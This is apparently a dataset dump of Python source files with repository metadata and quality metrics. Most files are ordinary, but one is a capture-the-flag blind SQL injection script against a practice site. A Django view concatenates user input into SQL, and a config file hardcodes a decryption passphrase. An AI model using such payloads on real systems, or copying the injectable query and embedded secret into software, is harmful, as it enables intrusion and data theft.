hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
c4c0c23efe0af691e686cdc320886e050cb8e361 | 636 | py | Python | 0x05/solve/ex1-0x05.py | tuannm-1876/sec-exercises | d8ea08bc02003af3722e0553060ed370ed395b33 | [
"MIT"
] | null | null | null | 0x05/solve/ex1-0x05.py | tuannm-1876/sec-exercises | d8ea08bc02003af3722e0553060ed370ed395b33 | [
"MIT"
] | null | null | null | 0x05/solve/ex1-0x05.py | tuannm-1876/sec-exercises | d8ea08bc02003af3722e0553060ed370ed395b33 | [
"MIT"
] | null | null | null | import urllib
import urllib2
url = "http://ctfq.sweetduet.info:10080/~q6/"
def main():
for i in range(1, 100):
data = {
"id": "admin' AND (SELECT LENGTH(pass) FROM user WHERE id = 'admin') = {counter} --".format(counter=i),
"pass": "",
}
print (data)
data1 = urllib.urlencode(data).encode("utf-8")
req = urllib2.Request(url, data1)
res = urllib2.urlopen(req)
print (res)
if int(res.headers["content-length"]) > 2000:
print("Do dai cua password: {counter}".format(counter=i))
break
if __name__ == "__main__":
main() | 30.285714 | 115 | 0.550314 | 77 | 636 | 4.441558 | 0.662338 | 0.040936 | 0.116959 | 0.122807 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.044248 | 0.289308 | 636 | 21 | 116 | 30.285714 | 0.712389 | 0 | 0 | 0 | 0 | 0.052632 | 0.276295 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052632 | false | 0.157895 | 0.105263 | 0 | 0.157895 | 0.157895 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
c4c4d67f988add89a513610e9e3367a81daf5283 | 593 | py | Python | code_examples/package_example/my_scripts/network/connect_telnet.py | natenka/natenka.github.io | 74c56be74f2c9b15a4c9b523a1622453ae2064af | [
"MIT"
] | 18 | 2017-02-19T15:58:54.000Z | 2022-02-13T22:15:19.000Z | code_examples/package_example/my_scripts/network/connect_telnet.py | natenka/natenka.github.io | 74c56be74f2c9b15a4c9b523a1622453ae2064af | [
"MIT"
] | 1 | 2020-02-24T23:14:15.000Z | 2020-02-24T23:14:15.000Z | code_examples/package_example/my_scripts/network/connect_telnet.py | natenka/natenka.github.io | 74c56be74f2c9b15a4c9b523a1622453ae2064af | [
"MIT"
] | 27 | 2017-05-03T15:38:41.000Z | 2022-02-08T02:53:38.000Z | import telnetlib
import time
def send_command_telnetlib(ipaddress, username, password, enable_pass, command):
t = telnetlib.Telnet("192.168.100.1")
t.read_until(b"Username:")
t.write(username.encode("ascii") + b"\n")
t.read_until(b"Password:")
t.write(password.encode("ascii") + b"\n")
t.write(b"enable\n")
t.read_until(b"Password:")
t.write(enable_pass.encode("ascii") + b"\n")
t.read_until(b"#")
t.write(b"terminal length 0\n")
t.write(command + b"\n")
time.sleep(1)
result = t.read_until(b"#").decode("utf-8")
return result
| 21.178571 | 80 | 0.63575 | 92 | 593 | 4 | 0.358696 | 0.097826 | 0.13587 | 0.149457 | 0.277174 | 0.23913 | 0.23913 | 0.23913 | 0 | 0 | 0 | 0.026639 | 0.177066 | 593 | 27 | 81 | 21.962963 | 0.727459 | 0 | 0 | 0.117647 | 0 | 0 | 0.164129 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058824 | false | 0.294118 | 0.117647 | 0 | 0.235294 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
c4c5720115308ec3559711c2319791d1086d71cd | 837 | py | Python | fullstack/migrations/0004_officeholder.py | TylerFisher/full-stack-react | dae5df2b85944e66a9ad0c64cad3e83b7cb1e173 | [
"MIT"
] | 9 | 2019-01-26T20:09:24.000Z | 2021-02-28T12:09:17.000Z | fullstack/migrations/0004_officeholder.py | dariyamizzou/full-stack-react | dae5df2b85944e66a9ad0c64cad3e83b7cb1e173 | [
"MIT"
] | 3 | 2020-02-11T23:49:18.000Z | 2021-06-10T21:13:36.000Z | fullstack/migrations/0004_officeholder.py | dariyamizzou/full-stack-react | dae5df2b85944e66a9ad0c64cad3e83b7cb1e173 | [
"MIT"
] | 1 | 2019-03-09T18:33:12.000Z | 2019-03-09T18:33:12.000Z | # Generated by Django 2.1.5 on 2019-01-27 22:45
from django.db import migrations, models
import django.db.models.deletion
import uuid
class Migration(migrations.Migration):
dependencies = [
('fullstack', '0003_auto_20190127_2223'),
]
operations = [
migrations.CreateModel(
name='Officeholder',
fields=[
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('term_start', models.DateField()),
('term_end', models.DateField()),
('office', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='fullstack.Office')),
('person', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='fullstack.Person')),
],
),
]
| 32.192308 | 114 | 0.612903 | 88 | 837 | 5.738636 | 0.590909 | 0.063366 | 0.083168 | 0.130693 | 0.253465 | 0.253465 | 0.253465 | 0.253465 | 0.253465 | 0.253465 | 0 | 0.051037 | 0.250896 | 837 | 25 | 115 | 33.48 | 0.754386 | 0.053763 | 0 | 0 | 1 | 0 | 0.136709 | 0.029114 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.157895 | 0 | 0.315789 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c4c7aa58a5a7074c7dc6f26bfd9244c8183f237e | 7,909 | py | Python | pages/views.py | SmartDataWithR/CovidHelper | 21f8c3f3d81da0b5ec32b228c711e96f9d5c168e | [
"MIT"
] | null | null | null | pages/views.py | SmartDataWithR/CovidHelper | 21f8c3f3d81da0b5ec32b228c711e96f9d5c168e | [
"MIT"
] | 9 | 2020-03-27T10:33:35.000Z | 2022-03-12T00:20:47.000Z | pages/views.py | SmartDataWithR/CovidHelper | 21f8c3f3d81da0b5ec32b228c711e96f9d5c168e | [
"MIT"
] | null | null | null | from django.views.generic import TemplateView
from ipware import get_client_ip
from django.shortcuts import render, redirect
from django.contrib import messages
from django.contrib.auth.forms import PasswordChangeForm
from django.contrib.auth import update_session_auth_hash
from django.conf import settings
from .forms import SearchForm
from users.models import CustomUser
import geopy
from geopy.distance import geodesic
import pandas as pd
import json
from django.utils.translation import gettext as _, activate
# required for IP to numeric
import socket
import struct
# import file for ip's to language mapping
df_ip_lang = pd.read_csv('pages/lng_map.csv', names=['ip_from', 'ip_to', 'country_code', 'country_name', 'lang_code'] )
def ip(request):
ip, is_routable = get_client_ip(request)
if ip is None:
ip = "0.0.0.0"
else:
if is_routable:
ipv = "Public"
else:
ipv = "Private"
return (ip, ipv)
def ip2int(addr):
return struct.unpack("!I", socket.inet_aton(addr))[0]
def index(request):
search = request.POST.get('search-field')
searchCat = request.POST.get('search-catogery')
locator = geopy.Nominatim(user_agent="myGeocoder")
gotodiv = False
# From IP to Language
#--------------------
request_ip = ip(request) # get request IP
request_ip_int = ip2int(request_ip[0]) # convert IP to numeric
df_filt = df_ip_lang[df_ip_lang.ip_from <= request_ip_int] # filter data for fetched ip
range_to_check = df_filt.iloc[-1]
is_in_range = request_ip_int > range_to_check.ip_from & request_ip_int < range_to_check.ip_to # check that my IP is in range
country_code = 'en-us' # initialise default language
if is_in_range: # if an entry is found in dataframe, set this one to country-code
country_code = range_to_check.lang_code
activate(country_code) # activate the current language code
current_path = str(request.get_full_path()).strip('/')
print(current_path)
# if user selected a language manually, use this one
if current_path == 'en':
activate('en-us')
elif current_path != '':
activate(current_path)
context = {}
if search != None:
location = locator.geocode(search, timeout=5)
if not hasattr(location, 'longitude'):
location = locator.geocode('Hamburg', timeout=5)
# get result for 'All' (Category 4)
if searchCat == '4':
sql_q = 'SELECT * FROM users_customuser'
else:
sql_q = 'SELECT * FROM users_customuser WHERE group_membership like ' + searchCat
print(sql_q)
#query = 'SELECT * FROM users_customuser'
#if search != None and searchCat == '4':
#df = pd.DataFrame([u.id, u.group_membership, u.longitude, u.latitude, u.slogan, u.zip_code, u.description, u.map_show_location, u.username, u.help_type] for u in CustomUser.objects.raw('SELECT * FROM users_customuser') )
#query = 'SELECT * FROM users_customuser'
#else:
#df = pd.DataFrame([u.id, u.group_membership, u.longitude, u.latitude, u.slogan, u.zip_code, u.description, u.map_show_location, u.username, u.help_type] for u in CustomUser.objects.raw('SELECT * FROM users_customuser WHERE group_membership = searchCat') )
#query = 'SELECT * FROM users_customuser WHERE group_membership = '.searchCat
# df = pd.DataFrame([u.id, u.group_membership, u.longitude, u.latitude, u.slogan, u.zip_code, u.description, u.map_show_location, u.username, u.help_type, u.userImg_Url] for u in CustomUser.objects.raw('SELECT * FROM users_customuser WHERE group_membership IN(SELECT group_membership FROM users_customuser WHERE (%s<>'' AND group_membership IN('0','1','3')) OR (%s<>'' AND group_membership=group_membership))', [searchCat]) )
#df = pd.DataFrame([u.id, u.group_membership, u.longitude, u.latitude, u.slogan, u.zip_code, u.description, u.map_show_location, u.username, u.help_type, u.userImg_Url] for u in CustomUser.objects.raw('SELECT * FROM users_customuser WHERE group_membership IN(SELECT group_membership FROM users_customuser WHERE (%s <> NULL AND group_membership IN('0','1','3')) OR (group_membership = group_membership))', [searchCat]) )
df = pd.DataFrame([u.id, u.group_membership, u.longitude, u.latitude, u.slogan, u.zip_code, u.description, u.map_show_location, u.username, u.help_type, u.userImg_Url, u.shop_type] for u in CustomUser.objects.raw(sql_q) )
df.columns = ['id','group_membership', 'longitude', 'latitude', 'slogan', 'zip_code', 'description', 'map_show_location', 'username', 'help_type', 'userImg_Url', 'shop_type']
df['distance'] = [geodesic((location.longitude, location.latitude), (x, y)).miles for x,y in zip(df['longitude'], df['latitude'])]
# filter for distance max 20km (12.4miles)
df_filt = df[df['distance'] < 12.4]
print(df_filt)
# pass the data to the template
group_membership = df_filt['group_membership'].values.tolist()
group_membership = [int(x) for x in group_membership]
help_type = df_filt['help_type'].values.tolist()
userImg_Url = df_filt['userImg_Url'].values.tolist()
slogan = df_filt['slogan'].values.tolist()
shop_type = df_filt['shop_type'].values.tolist()
description = df_filt['description'].values.tolist()
username = df_filt['username'].values.tolist()
zipcode = df_filt['zip_code'].values.tolist()
#tel_private = df_filt['tel_private'].values.tolist()
#tel_mobile = df_filt['tel_mobile'].values.tolist()
longitudes = df_filt['longitude'].values.tolist()
latitudes = df_filt['latitude'].values.tolist()
ids = df_filt['id'].values.tolist()
map_show_location = df_filt['map_show_location'].values.tolist()
map_show_location = [int(x) for x in map_show_location]
rname = list(range(0, len(ids)))
template_table = list(zip(rname, ids, slogan, description, zipcode))
gotodiv = 'search'
context = {'longitude': location.longitude, 'latitude': location.latitude,'id':ids, 'userImg_Url':userImg_Url, 'group_membership': group_membership, 'longitudes': longitudes, 'latitudes': latitudes, 'slogan': slogan, 'description': description, 'gotodiv': gotodiv, 'map_show_location':map_show_location, 'template_table':template_table, 'username':username, 'help_type':help_type}
return render(request, 'pages/home.html', context)
class HomePageView(TemplateView):
template_name = 'pages/home.html'
class AboutPageView(TemplateView):
template_name = 'pages/about.html'
def searchLocation(request):
form = SearchForm(request)
print(form)
if request.method=='POST':
form = SearchForm(request.POST)
return render(request, 'pages/home.html', {'form': form})
def change_password(request):
if request.method == 'POST':
form = PasswordChangeForm(request.user, request.POST)
if form.is_valid():
user = form.save()
update_session_auth_hash(request, user) # Important!
messages.success(request, 'Your password was successfully updated!')
return redirect('change_password')
else:
messages.error(request, 'Please correct the error below.')
else:
form = PasswordChangeForm(request.user)
return render(request, 'account/password_set.html', {
'form': form
})
def privacy(request):
return render(request, 'pages/privacy.html')
def imprint(request):
return render(request, 'pages/imprint.html')
def terms(request):
return render(request, 'pages/terms_conditions.html')
def cookie_policy(request):
return render(request, 'pages/cookie_policy.html')
| 48.820988 | 449 | 0.677709 | 1,050 | 7,909 | 4.922857 | 0.207619 | 0.072548 | 0.034823 | 0.043529 | 0.330238 | 0.264655 | 0.245889 | 0.221319 | 0.204101 | 0.204101 | 0 | 0.004578 | 0.19914 | 7,909 | 161 | 450 | 49.124224 | 0.811494 | 0.268808 | 0 | 0.060345 | 0 | 0 | 0.159513 | 0.013206 | 0 | 0 | 0 | 0 | 0 | 1 | 0.077586 | false | 0.060345 | 0.137931 | 0.043103 | 0.336207 | 0.051724 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
c4cd1bca866664aa443fc8b603dcfac8e9e9cf00 | 353 | py | Python | src/118. Pascal's Triangle.py | rajshrivastava/LeetCode | dfe6342fe22b324429b0be3e5c0fef46c7e6b3b0 | [
"MIT"
] | 1 | 2019-12-16T08:18:25.000Z | 2019-12-16T08:18:25.000Z | src/118. Pascal's Triangle.py | rajshrivastava/LeetCode | dfe6342fe22b324429b0be3e5c0fef46c7e6b3b0 | [
"MIT"
] | null | null | null | src/118. Pascal's Triangle.py | rajshrivastava/LeetCode | dfe6342fe22b324429b0be3e5c0fef46c7e6b3b0 | [
"MIT"
] | null | null | null | class Solution:
def generate(self, numRows: int) -> List[List[int]]:
result = [[1]]
for i in range(1, numRows):
temp = [1]
for j in range(1, i):
temp.append(result[-1][j-1] + result[-1][j])
temp.append(1)
result.append(temp)
return result
| 27.153846 | 60 | 0.450425 | 43 | 353 | 3.697674 | 0.418605 | 0.132075 | 0.100629 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.038462 | 0.410765 | 353 | 12 | 61 | 29.416667 | 0.725962 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0 | 0 | 0.3 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c4d236eae71088db952059a4c21b0e805b6bad1c | 2,228 | py | Python | components/icdc-sheepdog/sheepdog/utils/parse.py | CBIIT/icdc-docker | 5dc78b96a8d885b3fa427c55b9cc19f4771910fa | [
"Apache-2.0"
] | 2 | 2019-06-10T15:30:51.000Z | 2020-01-18T23:24:13.000Z | components/icdc-sheepdog/sheepdog/utils/parse.py | CBIIT/icdc-docker | 5dc78b96a8d885b3fa427c55b9cc19f4771910fa | [
"Apache-2.0"
] | null | null | null | components/icdc-sheepdog/sheepdog/utils/parse.py | CBIIT/icdc-docker | 5dc78b96a8d885b3fa427c55b9cc19f4771910fa | [
"Apache-2.0"
] | 1 | 2022-03-31T09:52:46.000Z | 2022-03-31T09:52:46.000Z | """
TODO
"""
from collections import Counter
import simplejson
import yaml
import flask
from sheepdog.errors import (
UserError,
)
def oph_raise_for_duplicates(object_pairs):
"""
Given an list of ordered pairs, contstruct a dict as with the normal JSON
``object_pairs_hook``, but raise an exception if there are duplicate keys
with a message describing all violations.
"""
counter = Counter(p[0] for p in object_pairs)
duplicates = [p for p in counter.iteritems() if p[1] > 1]
if duplicates:
raise ValueError(
'The document contains duplicate keys: {}'
.format(','.join(d[0] for d in duplicates))
)
return {pair[0]: pair[1] for pair in object_pairs}
def parse_json(raw):
"""
Return a python representation of a JSON document.
Args:
raw (str): string of raw JSON content
Raises:
UserError: if any exception is raised parsing the JSON body
.. note:: Uses :func:`oph_raise_for_duplicates` in parser.
"""
try:
return simplejson.loads(
raw, object_pairs_hook=oph_raise_for_duplicates
)
except Exception as e:
raise UserError('Unable to parse json: {}'.format(e))
def parse_request_json(expected_types=(dict, list)):
"""
Return a python representation of a JSON POST body.
Args:
raw (str): string of raw JSON content
Return:
TODO
Raises:
UserError: if any exception is raised parsing the JSON body
UserError: if the result is not of the expected type
If raw is not provided, pull the body from global request object.
"""
parsed = parse_json(flask.request.get_data())
if not isinstance(parsed, expected_types):
raise UserError('JSON parsed from request is an invalid type: {}'
.format(parsed.__class__.__name__))
return parsed
def parse_request_yaml():
"""
Return a python representation of a YAML POST body. Raise UserError if any
exception is raised parsing the YAML body.
"""
try:
return yaml.safe_load(flask.request.get_data())
except Exception as e:
raise UserError('Unable to parse yaml: {}'.format(e))
| 26.52381 | 78 | 0.653501 | 300 | 2,228 | 4.736667 | 0.33 | 0.038705 | 0.023223 | 0.044335 | 0.283603 | 0.283603 | 0.262491 | 0.214638 | 0.140746 | 0.07741 | 0 | 0.003656 | 0.263465 | 2,228 | 83 | 79 | 26.843373 | 0.862279 | 0.386445 | 0 | 0.117647 | 0 | 0 | 0.110121 | 0 | 0 | 0 | 0 | 0.024096 | 0 | 1 | 0.117647 | false | 0 | 0.147059 | 0 | 0.382353 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c4d694c5a7929d60a82f4266c36fe92a6487d6e2 | 910 | py | Python | example/models.py | nim65s/django-jugemaj | 771fb5ddb7ceaa3f6b8aa4178c95ab249a8ed406 | [
"BSD-2-Clause"
] | null | null | null | example/models.py | nim65s/django-jugemaj | 771fb5ddb7ceaa3f6b8aa4178c95ab249a8ed406 | [
"BSD-2-Clause"
] | 15 | 2017-06-08T08:12:36.000Z | 2022-03-21T20:03:02.000Z | example/models.py | nim65s/django-jugemaj | 771fb5ddb7ceaa3f6b8aa4178c95ab249a8ed406 | [
"BSD-2-Clause"
] | null | null | null | """Django models for the example app."""
from django.db import models
from wikidata.client import Client # type: ignore
LANGS = ["fr", "en"] # ordered list of langages to check on wikidata
class WikiDataModel(models.Model):
"""A django model to represent something available on wikidata."""
name = models.CharField(max_length=50)
wikidata = models.PositiveIntegerField()
def __str__(self):
"""Get the name of this wikidata instance."""
return self.name
@property
def wikidata_url(self):
"""Get a direct link to the wikidata item."""
return f"https://www.wikidata.org/wiki/Q{self.wikidata}"
def update_name(self):
"""Update the name from wikidata."""
labels = Client().get(f"Q{self.wikidata}", load=True).data["labels"]
self.name = next(labels[lang] for lang in LANGS if lang in labels)["value"]
self.save()
| 30.333333 | 83 | 0.657143 | 123 | 910 | 4.804878 | 0.528455 | 0.040609 | 0.043993 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002805 | 0.216484 | 910 | 29 | 84 | 31.37931 | 0.826087 | 0.292308 | 0 | 0 | 0 | 0 | 0.124797 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.133333 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
c4e5fbaf6cd5fcd29917077a2405f0c945660808 | 992 | py | Python | minimalist_cms/cms_content/migrations/0004_auto_20190719_1242.py | wullerot/django-minimalist-cms | bd6795d9647f9db1d98e83398238c0e63aca3c1b | [
"MIT"
] | null | null | null | minimalist_cms/cms_content/migrations/0004_auto_20190719_1242.py | wullerot/django-minimalist-cms | bd6795d9647f9db1d98e83398238c0e63aca3c1b | [
"MIT"
] | null | null | null | minimalist_cms/cms_content/migrations/0004_auto_20190719_1242.py | wullerot/django-minimalist-cms | bd6795d9647f9db1d98e83398238c0e63aca3c1b | [
"MIT"
] | null | null | null | # Generated by Django 2.1.10 on 2019-07-19 12:42
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('contenttypes', '0002_remove_content_type_name'),
('cms_content', '0003_auto_20190719_1232'),
]
operations = [
migrations.AlterModelOptions(
name='element',
options={'ordering': ['position'], 'verbose_name': 'Element', 'verbose_name_plural': 'Element'},
),
migrations.AddField(
model_name='container',
name='content_type',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='contenttypes.ContentType', verbose_name='Content type'),
),
migrations.AddField(
model_name='container',
name='object_id',
field=models.PositiveIntegerField(blank=True, null=True, verbose_name='Object ID'),
),
]
| 33.066667 | 164 | 0.633065 | 103 | 992 | 5.92233 | 0.533981 | 0.072131 | 0.045902 | 0.072131 | 0.131148 | 0.131148 | 0 | 0 | 0 | 0 | 0 | 0.047682 | 0.238911 | 992 | 29 | 165 | 34.206897 | 0.760265 | 0.046371 | 0 | 0.304348 | 1 | 0 | 0.240466 | 0.080508 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.086957 | 0 | 0.217391 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c4e7ad2ce4410048f7e3d9df95d8ae13cd8fa8fc | 3,174 | py | Python | original-paas/copy_to_container/www/spdpaas/src/celeryApp/celeryConfig.py | yishan1331/docker-practice | 91a1a434cbffc33790678af5e09de310386812d1 | [
"MIT"
] | null | null | null | original-paas/copy_to_container/www/spdpaas/src/celeryApp/celeryConfig.py | yishan1331/docker-practice | 91a1a434cbffc33790678af5e09de310386812d1 | [
"MIT"
] | null | null | null | original-paas/copy_to_container/www/spdpaas/src/celeryApp/celeryConfig.py | yishan1331/docker-practice | 91a1a434cbffc33790678af5e09de310386812d1 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
==============================================================================
created : 02/08/2021
Last update: 02/08/2021
Developer: Yishan Tsai
Lite Version 1 @Yishan08032019
Filename: celeryconfig.py
Description: about celery configuration
==============================================================================
"""
from kombu import Queue
class BaseConfig(object):
CELERY_ACCEPT_CONTENT= ['json']
CELERY_TASK_SERIALIZER= 'json'
CELERY_RESULT_SERIALIZER= 'json'
CELERY_ENABLE_UTC=True
CELERY_TIMEZONE='Asia/Taipei'
# CELERY_ACKS_LATE=True, #https://kknews.cc/zh-tw/code/5v5vj52.html
CELERYD_PREFETCH_MULTIPLIER=1
CELERYD_MAX_TASKS_PER_CHILD=50 #memory leak
CELERY_IGNORE_RESULT=True
CELERY_STORE_ERRORS_EVEN_IF_IGNORED=True
CELERY_TASK_CREATE_MISSING_QUEUES=False
CELERY_QUEUES = {
# Queue("default", routing_key = "default"),
# Queue("queue1", routing_key = "high", queue_arguments={'maxPriority': 10}), #https://github.com/squaremo/amqp.node/issues/165
Queue("H-queue1", routing_key = "high"),
Queue("L-queue1", routing_key = "low")
}
CELERY_TASK_ROUTES = {
'celeryApp.celeryTasks.celery_trigger_specific_program': {'queue': 'H-queue1','routing_key':'high'},
'celeryApp.celeryTasks.celery_post_api_count_record': {'queue': 'L-queue1','routing_key':'low'},
'celeryApp.celeryTasks.celery_send_email': {'queue': 'L-queue1','routing_key':'low'},
}
def readConfig():
import os, time
import ConfigParser
from app.globalvar import CONFIG as _CONFIG
try:
get_request_start_time = int(round(time.time()* 1000000))
if not os.path.isfile('/var/www/spdpaas/config/deconstants_{}.conf'.format(str(get_request_start_time))):
with os.popen('/usr/bin/openssl enc -aes-128-cbc -d -in /var/www/spdpaas/config/encconstants.conf -out /var/www/spdpaas/config/deconstants_{}.conf -pass pass:sapidotest2019'.format(str(get_request_start_time))) as osdecrypt:
osdecrypt.read()
CONFPATH = "/var/www/spdpaas/config/deconstants_{}.conf".format(str(get_request_start_time))
CONFIG = ConfigParser.ConfigParser()
CONFIG.read(CONFPATH)
dicConfig = {
"celery_broker":CONFIG.get('Celery', 'broker'),
"celery_result_backend":CONFIG.get('Celery', 'result_backend'),
"dbpostgres_ip":CONFIG.get(_CONFIG["SYSTEM"]["POSTGRESQL"],'ip'),
"dbpostgres_port":CONFIG.get(_CONFIG["SYSTEM"]["POSTGRESQL"],'port'),
